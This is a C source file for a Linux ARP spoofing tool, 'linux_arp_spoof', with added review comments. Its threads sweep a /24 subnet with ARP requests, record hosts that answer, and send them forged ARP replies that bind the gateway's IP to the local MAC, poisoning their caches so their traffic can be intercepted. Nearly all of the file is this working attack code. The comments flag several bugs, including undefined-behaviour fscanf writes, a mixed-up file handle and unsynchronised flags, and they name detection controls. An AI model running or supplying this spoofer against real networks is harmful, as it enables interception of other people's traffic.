
📄 tcpip.txt

📁 用原始套接字LINUX下局域网ARP欺骗的代码
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <sys/time.h> 
#include <unistd.h> 
#include <sys/socket.h> 
#include <linux/if_arp.h> 
#include <netdb.h> 
#include <errno.h> 
#include <linux/if_ether.h> 
#include <arpa/inet.h> 
#include <sys/ioctl.h> 
#include <netinet/in.h> 
#include <netinet/ip.h> 
#include <netinet/udp.h> 
#include <netinet/tcp.h> 
#include <pthread.h> 
// Interface name that main() copies into ifr.ifr_name before its ioctl() queries. 
#define ETH_INT "eth0" 
// Strings printed by the -v / -V command-line option. 
#define PROGRAME_NAME "linux_arp_spoof" 
#define PROGRAME_VERSION "1.0.1.19" 
#define MAKETIME "08/11/30 17:21" 
// AF_PACKET raw socket opened in main() and used by all three threads. 
int sockfd; 
// Set to 1 by get_arp_reply() and reset to 0 by send_one_arp(). 
// It is a plain int: no lock or atomic protects the cross-thread access. 
int send_arp_flag = 0; 
// Handles for the "iplist" file: fp1 is assigned in get_arp_reply(), fp2 in send_one_arp(). 
FILE *fp1,*fp2; 
// Link-layer address passed to every sendto(); main() fills sll_ifindex and sll_protocol. 
struct sockaddr_ll _sockaddr; 
// Local IPv4 address, parsed in main() from the SIOCGIFADDR result. 
unsigned char my_ip[4]; 
// Local hardware address, copied in main() from the SIOCGIFHWADDR result. 
unsigned char my_mac[6]; 
// Gateway IPv4 address, parsed in main() from argv[1]. 
unsigned char gateway_ip[4]; 
// Starts as a copy of gateway_ip; send_arp() overwrites the last octet on each iteration. 
unsigned char attack_ip[4]; 
// Ethernet broadcast address used as the destination of the ARP requests. 
unsigned char broadcast_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; 
// Ethernet frame header: destination MAC, source MAC and EtherType (6 + 6 + 2 = 14 bytes). 
struct frame_hdr 
{ 
        unsigned char dst_mac[6]; 
        unsigned char src_mac[6]; 
        // Stored in network byte order; the senders assign htons(ETH_P_ARP). 
        unsigned short frm_type; 
}; 
// Complete ARP frame as sent and parsed by this file; the original comment gives 
// its size as 14 + 8 + 20 bytes (Ethernet header, struct arphdr, address fields). 
// NOTE(review): no packed attribute is used, so the layout presumably relies on 
// the compiler inserting no padding between members - confirm. 
struct frame_ether 
{ 
        struct frame_hdr fh; 
        struct arphdr ah; 
        // ARP sender hardware / protocol address. 
        unsigned char src_mac[6]; 
        unsigned char src_ip[4]; 
        // ARP target hardware / protocol address. 
        unsigned char dst_mac[6]; 
        unsigned char dst_ip[4]; 
}; 

// Thread body: whenever send_arp_flag is 1, broadcast one ARP request per 
// address read from the "iplist" file, then reset the flag to 0. 
// The outer loop polls the flag with no sleep or wait, and the function never 
// returns, so no value is ever produced for the void * return type. 
void *send_one_arp() 
{ 
for(;;) 
{ 
  // Unsynchronised read of a flag written by get_arp_reply() on another thread. 
  if(send_arp_flag == 1) 
  { 
   unsigned char d_ip[4]; 
   struct frame_ether frame; 
   // Ethernet header: broadcast destination, local MAC as source, EtherType ARP. 
   memcpy(frame.fh.dst_mac,broadcast_mac,6); 
   memcpy(frame.fh.src_mac,my_mac,6); 
   frame.fh.frm_type = htons(ETH_P_ARP); 
   // ARP header: Ethernet / IPv4, 6-byte hardware and 4-byte protocol addresses, request. 
   frame.ah.ar_hrd = htons(ARPHRD_ETHER); 
   frame.ah.ar_pro = htons(ETH_P_IP); 
   frame.ah.ar_hln = 6; 
   frame.ah.ar_pln = 4; 
   frame.ah.ar_op = htons(ARPOP_REQUEST); 
   // The sender fields carry this host's real MAC and IP. 
   memcpy(frame.src_mac,my_mac,6); 
   memcpy(frame.src_ip,my_ip,4); 
   memcpy(frame.dst_mac,broadcast_mac,6); 
   // The file is opened into fp2, but the loop below reads through fp1, the handle 
   // that get_arp_reply() opens and closes on another thread, with no locking. 
   if(fp2=fopen("iplist","r")) 
   { 
    while(!feof(fp1)) 
    { 
//     printf("%d.%d.%d.%d\n",d_ip[0],d_ip[1],d_ip[2],d_ip[3]); 
     // NOTE(review): %d stores a full int through each unsigned char pointer, so 
     // these writes run past d_ip[] (undefined behaviour); the return value is not checked. 
     fscanf(fp1,"%d.%d.%d.%d\n",&d_ip[0],&d_ip[1],&d_ip[2],&d_ip[3]); 
     memcpy(frame.dst_ip,d_ip,4); 
     int arp_request = sendto(sockfd,&frame,sizeof(frame),0,(struct sockaddr*) 
&_sockaddr,sizeof(_sockaddr)); 
     if(arp_request > 0) 
     { 
      // Log "[local mac](local ip) ---request (broadcast)---> [ff:..](target ip)". 
      printf("-------------------------------------------------------------------- 
-----------\n"); 
      printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)",my_mac[0],my_mac 
[1],my_mac[2],my_mac[3],my_mac[4],my_mac[5],my_ip[0],my_ip[1],my_ip[2],my_ip[3]); 
      printf("\t ---request (broadcast)--->\t"); 
      printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)\n",broadcast_mac 
[0],broadcast_mac[1],broadcast_mac[2],broadcast_mac[3],broadcast_mac[4],broadcast_mac[5],d_ip[0],d_ip[1],d_ip[2],d_ip[3]); 
     } 
     else 
     { 
      perror("sendto"); 
     } 
    } 
   } 
   // Runs even when fopen() returned NULL, in which case fclose(NULL) is undefined behaviour. 
   fclose(fp2); 
   send_arp_flag = 0; 
  } 
} 
} 
// Thread body: repeatedly broadcasts ARP requests for last octets 1..254 of the 
// gateway's address prefix, skipping the gateway's and this host's own last octet. 
// Only the last octet is varied, so the code effectively assumes a /24 network. 
// On the wire this appears as a periodic ARP request sweep from a single source MAC. 
// The function loops forever and never returns a value. 
void *send_arp() 
{ 
int i; 
struct frame_ether frame; 
memset(&frame,0,sizeof(frame)); 
/* set ether head */ 
memcpy(frame.fh.dst_mac,broadcast_mac,6); 
memcpy(frame.fh.src_mac,my_mac,6); 
frame.fh.frm_type = htons(ETH_P_ARP); 
/* define arp ether head */ 
frame.ah.ar_hrd = htons(ARPHRD_ETHER); 
frame.ah.ar_pro = htons(ETH_P_IP); 
frame.ah.ar_hln = 6; 
frame.ah.ar_pln = 4; 
frame.ah.ar_op = htons(ARPOP_REQUEST); 
/* the sender fields carry this host's real MAC and IP */ 
memcpy(frame.src_mac,my_mac,6); 
memcpy(frame.src_ip,my_ip,4); 
memcpy(frame.dst_mac,broadcast_mac,6); 
/* send arp request broadcast */ 
for(;;) 
{ 
  for(i=1;i<255;i++) 
  { 
   /* pause two seconds at every tenth value of i */ 
   if((i%10) == 0) 
    sleep(2); 
   if(i == gateway_ip[3] || i == my_ip[3]) 
   { 
    continue; 
   } 
   else 
   { 
    /* attack_ip is a global; only this thread writes its last octet */ 
    attack_ip[3] = i; 
    memcpy(frame.dst_ip,attack_ip,4); 
    int arp_request = sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&_sockaddr, 
sizeof(_sockaddr)); 
    /* prints the sendto() return value, which is -1 on failure */ 
    printf("size of : %d\n",arp_request); 
    if(arp_request > 0) 
    { 
     printf("---------------------------------------------------------------------------- 
---\n"); 
     printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)",my_mac[0],my_mac[1],my_mac 
[2],my_mac[3],my_mac[4],my_mac[5],my_ip[0],my_ip[1],my_ip[2],my_ip[3]); 
     printf("\t ---request (broadcast)--->\t"); 
     printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)\n",broadcast_mac 
[0],broadcast_mac[1],broadcast_mac[2],broadcast_mac[3],broadcast_mac[4],broadcast_mac[5],attack_ip[0],attack_ip[1],attack_ip 
[2],attack_ip[3]); 
    } 
    else 
    { 
     perror("sendto"); 
    } 
   } 
  } 
  /* three-second pause between full passes */ 
  sleep(3); 
} 
} 
// Thread body: receives frames on the raw socket, logs every ARP frame, and for 
// each ARP reply addressed to this host from a non-gateway address sends back an 
// ARP reply whose sender IP is gateway_ip and whose sender MAC is my_mac. The 
// address that replied is appended to the "iplist" file if not already listed. 
// ARP requests to or from the gateway set send_arp_flag for send_one_arp(). 
// Network-side signal: an ARP reply that binds the gateway's IPv4 address to a 
// MAC other than the gateway's; ARP-table monitoring, dynamic ARP inspection or 
// static gateway entries are the usual controls for this. 
// All address comparisons use only the last octet, so a /24 network is assumed. 
// The function loops forever and never returns a value. 
void *get_arp_reply() 
{ 
// i is never used; flag records whether the replying address is already in "iplist". 
int flag,i=0; 
unsigned char b_ip[4]; 
char buf[2048]; 
for(;;) 
{ 
  // NOTE(review): n is never checked, so a failed or short recv() is still parsed 
  // below and the parser may then read bytes of buf that were never written. 
  int n = recv(sockfd,buf,2048,0); 
  struct ethhdr *eth = (struct ethhdr *) buf; 
  if((ntohs(eth->h_proto)) == ETH_P_ARP) 
  { 
   printf("-------------------------------------------------------------------------------\n"); 
   // old_frame views the received bytes in place; frame is a copy that is 
   // edited below to become the outgoing reply. 
   struct frame_ether *old_frame = (struct frame_ether*)buf; 
   struct frame_ether frame; 
   memcpy(&frame,buf,sizeof(frame)); 
   int ar_op = ntohs(frame.ah.ar_op); 
   //----------------arp frame info--------------------------------------// 
   // Log "[sender mac](sender ip) ---reply/request---> [target mac](target ip)". 
   char ip_buf[100]; 
   inet_ntop(AF_INET, &old_frame->src_ip, ip_buf, 100); 
   printf("[%02x:%02x:%02x:%02x:%02x:%02x](%s)", old_frame->src_mac[0],old_frame->src_mac[1],old_frame- 
>src_mac[2],old_frame->src_mac[3],old_frame->src_mac[4],old_frame->src_mac[5], ip_buf); 
   printf("\t ---"); 
   // The literals 2 and 1 match the ARPOP_REPLY / ARPOP_REQUEST tests further down. 
   if(ar_op == 2) 
    printf("reply--->\t"); 
   if(ar_op == 1) 
    printf("request--->\t"); 
   memset(ip_buf,0,100); 
   inet_ntop(AF_INET, &old_frame->dst_ip, ip_buf, 100); 
   printf("[%02x:%02x:%02x:%02x:%02x:%02x](%s)", old_frame->dst_mac[0],old_frame->dst_mac[1],old_frame- 
>dst_mac[2],old_frame->dst_mac[3],old_frame->dst_mac[4],old_frame->dst_mac[5], ip_buf); 
   printf("\n"); 
   //--------------------fake arp frame----------------------------// 
   // Condition: an ARP reply whose target IP ends in this host's last octet and 
   // whose sender IP does not end in the gateway's last octet. 
   if(ar_op == ARPOP_REPLY && (old_frame->dst_ip)[3] == my_ip[3] && (old_frame->src_ip)[3] != 
gateway_ip[3]) 
   {//judge the packet is normal arp reply from attack ip// 
    //build faked arp reply frame: addressed to the host that replied, with 
    //sender MAC = my_mac and sender IP = gateway_ip 
    memcpy(frame.fh.dst_mac,old_frame->fh.src_mac,6); 
    memcpy(frame.fh.src_mac,my_mac,6); 
    frame.ah.ar_op = htons(ARPOP_REPLY); 
    memcpy(frame.dst_mac,old_frame->fh.src_mac,6); 
    memcpy(frame.dst_ip,old_frame->src_ip,4); 
    memcpy(frame.src_mac,my_mac,6); 
    memcpy(frame.src_ip,gateway_ip,4); 
    //send faked arp reply frame 
    int arp_reply = sendto(sockfd,&frame,sizeof(frame),0,(struct sockaddr*)&_sockaddr,sizeof 
(_sockaddr)); 
    if(arp_reply > 0) 
    { 
     flag = 0; 
     printf("send faked arp reply to %d.%d.%d.%d \n",(old_frame->src_ip)[0],(old_frame- 
>src_ip)[1],(old_frame->src_ip)[2],(old_frame->src_ip)[3]); 
     // "iplist" is a relative path, so the file is created in the process's 
     // working directory. NOTE(review): "ar+" is not one of the standard 
     // fopen() mode strings. 
     if(fp1=fopen("iplist","ar+")) 
     { 
      while(!feof(fp1)) 
      { 
       // NOTE(review): %d stores a full int through each unsigned char pointer, so 
       // these writes run past b_ip[] (undefined behaviour); the return value is not checked. 
       fscanf(fp1,"%d.%d.%d.%d\n",&b_ip[0],&b_ip[1],&b_ip[2],&b_ip[3]); 
       if(b_ip[3] == (old_frame->src_ip)[3]) 
       { 
        flag = 1; 
        break; 
       } 
      } 
      if(flag == 0) 
      { 
       fprintf(fp1,"%d.%d.%d.%d\n",(old_frame->src_ip)[0],(old_frame- 
>src_ip)[1],(old_frame->src_ip)[2],(old_frame->src_ip)[3]); 
      } 
     } 
     // Runs even when fopen() returned NULL, in which case fclose(NULL) is undefined behaviour. 
     fclose(fp1); 
    } 
    else 
    { 
     perror("sendto"); 
    } 
   } 
   // && binds tighter than ||, so this reads: (request from the gateway) or 
   // (request for the gateway). The reply-from-gateway clause is commented out. 
   if(ar_op == ARPOP_REQUEST && (old_frame->src_ip)[3] == gateway_ip[3] || ar_op == ARPOP_REQUEST && 
(old_frame->dst_ip)[3] == gateway_ip[3]/* || ar_op == ARPOP_REPLY && (old_frame->src_ip)[3] == gateway_ip[3]*/) 
   { 
    // Unsynchronised write; send_one_arp() polls this flag on another thread. 
    send_arp_flag = 1; 
   } 
  } 
} 
} 
// Entry point: takes exactly one argument (-v/-V, -h/-H, or the gateway IPv4 
// address), opens an AF_PACKET raw socket for ARP, reads the index, MAC and IPv4 
// address of ETH_INT, fills the globals, deletes any existing "iplist" file and 
// starts the three worker threads. The workers never return, so the 
// pthread_join() calls at the end block indefinitely. 
// Opening an AF_PACKET raw socket normally requires root or CAP_NET_RAW. 
int main(int argc, char **argv) 
{ 
// never used 
unsigned char *attack; 
if(argc == 2) 
{ 
  if((strcmp(argv[1],"-v"))==0||(strcmp(argv[1],"-V"))==0) 
  { 
   printf("%s version %s\n", PROGRAME_NAME,PROGRAME_VERSION); 
   printf("last make date : %s\n",MAKETIME); 
   exit(1); 
  } 
  if((strcmp(argv[1],"-h"))==0||(strcmp(argv[1],"-H"))==0) 
  { 
   printf("usage : ./linux_arp_spoof [gatewayip]\n"); 
   exit(1); 
  } 
  // NOTE(review): inet_addr() returns an unsigned 32-bit in_addr_t, so where long 
  // is 64 bits this cast is never negative and the test rejects nothing; the 
  // result is not compared with INADDR_NONE. 
  if((long)inet_addr(argv[1]) < 0) 
  { 
   printf("parameter error : IP error. \n"); 
   exit(1); 
  } 
} 
else 
{ 
  printf("parameter error,please check -h \n"); 
  exit(-1); 
} 
int i; 
unsigned char *cp_ip; 
unsigned int src_ip[4]; 
struct sockaddr_in sin; 
struct ifreq ifr; 
if((sockfd=socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)))<0) 
{ 
  perror("socket"); 
  // exits with status 0 although socket() failed 
  exit(0); 
} 
memset(&_sockaddr,0,sizeof(_sockaddr)); 
// NOTE(review): sizeof(&ifr) is the size of a pointer, so only the first few 
// bytes of ifr are zeroed and the rest of the struct stays uninitialised. 
memset(&ifr,0,sizeof(&ifr)); 
// which interface in work mode 
strcpy(ifr.ifr_name,ETH_INT); 
if(ioctl(sockfd,SIOCGIFINDEX,&ifr) != 0) 
{ 
  perror("ioctl"); 
  close(sockfd); 
  exit(1); 
} 
//get local mac 
if(ioctl(sockfd,SIOCGIFHWADDR,&ifr) < 0) 
{ 
  perror("ioctl"); 
  close(sockfd); 
  exit(2); 
} 
// my_mac = ifr.ifr_hwaddr.sa_data; 
for(i=0;i<6;i++) 
{ 
  my_mac[i] = (unsigned char)ifr.ifr_hwaddr.sa_data[i]; 
} 
//get local ip 
if(ioctl(sockfd,SIOCGIFADDR,&ifr) < 0) 
{ 
  perror("ioctl"); 
  close(sockfd); 
  // exits with status 0 although the ioctl failed 
  exit(0); 
} 
memcpy(&sin, &ifr.ifr_addr, sizeof(sin)); 
// printf("%s \n",inet_ntoa(sin.sin_addr)); 
// initialise parameters: derive the local address, the gateway and the network prefix 
// The local address is formatted as text and parsed back into four octets. 
// NOTE(review): cp_ip is unsigned char * but is passed where sscanf() expects 
// const char *, and neither sscanf() return value is checked. 
cp_ip = (unsigned char *)inet_ntoa(sin.sin_addr); 
sscanf(cp_ip,"%d.%d.%d.%d",&src_ip[0],&src_ip[1],&src_ip[2],&src_ip[3]); 
for(i=0;i<4;i++) 
{ 
  my_ip[i] = src_ip[i]; 
} 
// The same parse is applied to the gateway address from the command line; 
// attack_ip starts as a copy of it and send_arp() later varies its last octet. 
cp_ip = argv[1]; 
sscanf(cp_ip,"%d.%d.%d.%d",&src_ip[0],&src_ip[1],&src_ip[2],&src_ip[3]); 
for(i=0;i<4;i++) 
{ 
  gateway_ip[i] = src_ip[i]; 
  attack_ip[i] = src_ip[i]; 
} 
_sockaddr.sll_ifindex = ifr.ifr_ifindex; 
_sockaddr.sll_protocol = htons(ETH_P_ARP); 
// create the worker threads 
// Any "iplist" file left in the working directory by an earlier run is deleted first. 
remove("iplist"); 
pthread_t id[3]; 
memset(&id,0,sizeof(id)); 
if(pthread_create(&id[0],NULL,send_arp,NULL) !=0) 
{ 
  printf("create pthread1 error\n"); 
  exit(1); 
} 
if(pthread_create(&id[1],NULL,get_arp_reply,NULL) !=0) 
{ 
  printf("create pthread2 error\n"); 
  exit(1); 
} 
if(pthread_create(&id[2],NULL,send_one_arp,NULL) !=0) 
{ 
  printf("create pthread3 error\n"); 
  exit(1); 
} 
// None of the three thread functions returns, so these joins never complete. 
pthread_join(id[0],NULL); 
pthread_join(id[1],NULL); 
pthread_join(id[2],NULL); 
} 
